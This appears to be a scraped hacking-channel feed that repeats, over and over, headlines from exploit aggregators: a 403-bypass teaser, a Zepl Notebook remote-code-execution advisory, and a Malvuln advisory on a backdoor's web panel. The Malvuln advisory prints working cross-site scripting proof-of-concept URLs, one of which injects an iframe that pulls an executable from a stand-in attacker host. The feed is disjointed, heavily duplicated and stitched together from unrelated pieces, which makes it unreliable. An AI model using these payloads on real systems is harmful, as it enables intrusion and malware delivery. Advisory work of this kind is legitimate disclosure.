403 forbidden bypass & Accessing config files using a header
https://medium.com/@vishnurajr/403-forbidden-bypass-accessing-config-files-using-a-header-4bd172c25ff1?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@vishnurajr/403-forbidden-bypass-accessing-config-files-using-a-header-4bd172c25ff1?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
403 forbidden bypass & Accessing config files using a header
This is my first writeup on how i bypass 403 & accessed the config file
This is my first writeup on how i bypass 403 & accessed the config fileContinue reading on Medium » (https://medium.com/@vishnurajr/403-forbidden-bypass-accessing-config-files-using-a-header-4bd172c25ff1?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
403 forbidden bypass & Accessing config files using a header
This is my first writeup on how i bypass 403 & accessed the config file
Exploit Collector
Backdoor.Win32.Zombam.b Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Zombam.b Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Zombam.b Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Zepl Notebook Remote Code Execution
https://4.bp.blogspot.com/-1sVwQJsRVpo/WWlvgaUDftI/AAAAAAAAIQM/9m_QfduSdAQi14Fs6kLQe2-YLO5Bx1iKQCLcBGAs/s1600/h87.png
Zepl Notebook suffers from a remote code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Zepl Notebook Remote Code Execution
https://4.bp.blogspot.com/-1sVwQJsRVpo/WWlvgaUDftI/AAAAAAAAIQM/9m_QfduSdAQi14Fs6kLQe2-YLO5Bx1iKQCLcBGAs/s1600/h87.png
Zepl Notebook suffers from a remote code execution vulnerability.
MD5 |
9d603c1863096f6609b45bc48296b1f4Download
Exploit Title: Zepl Notebook - Remote Code Execution
Date: 9/28/2021
Vendor Homepage: https://zepl.com/
Software Link: https://app.zepl.com/
Version: All previous versions of product to the date of this submission
Tested on: The issue affects all versions of the product up to the date of this submission
Exploit Authors: Josh Sheppard & Pathfynder Inc
Exploit Contact: ghost a t undervurse dot_com & josh a t pathfynder dot_io
Exploit Technique: Remote
CVE ID: CVE-2021-42950
1. Description
A remote code execution vulnerability has been discovered in Zepl's Notebooks product. Users can register for an account and are allocated a set number of credits to try the product. Once users authenticate, they can proceed to create a new organization by which additional users can be added for various collaboration abilities. Once this has been established, users can then create new Zepl Notebooks with various languages, contexts and deployment scenarios. Upon creating a new notebook with specially crafted malicious code, a user can then launch remote code execution.
This vulnerability effects all previous versions of their Notebook product suite.
2. Disclosure Timeline
9/28/21 - Discovery and Exploitation
9/28/21 - Vendor Notified
2/16/22 - CVE Assignment
2/17/22 - Public Disclosure
3. Mitigation
Hotfix applied to vendors SAAS solution, no action is necessary at this time.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Zepl Notebook Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Car Portal Template Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Car Portal Template Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Car Portal Template Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Zombam.b Cross Site Scripting
https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Backdoor.Win32.Zombam.b malware suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Zombam.b Cross Site Scripting
https://1.bp.blogspot.com/-5p3p8L1fqP0/WWlvePVRIQI/AAAAAAAAIPs/HQNau6TSJkE3hBLTqqPcfPLddrlr7m4uACLcBGAs/s1600/h81.png
Backdoor.Win32.Zombam.b malware suffers from a cross site scripting vulnerability.
MD5 |
b1ac80e15a77aa8cb4efc419893b6e27Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee_C.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Zombam.b
Vulnerability: Cross Site Scripting (XSS)
Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user.
Type: PE32
MD5: 1e3665a67201209609ae493a2a590bee
Vuln ID: MVID-2022-0489
Disclosure: 02/16/2022
Exploit/PoC:
Tested successfully in Firefox.
http://MALWARE_INFECTED_HOST/proc%22/%3E%3Cscript%3Ealert(%22MALVULN%22)%3C/script%3E
http://MALWARE_INFECTED_HOST/proc%22/%3E%3Ciframe%20src=%22http://THIRD_PARTY_ATTACKER/DOOM.exe%22%3E%3C/iframe%3E
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Zombam.b Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Zombam.b Information Disclosure
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Zombam.b Information Disclosure
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Zombam.b Information Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Prorat.lkt Weak Hardcoded Password
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Prorat.lkt Weak Hardcoded Password
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Prorat.lkt Weak Hardcoded Password
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.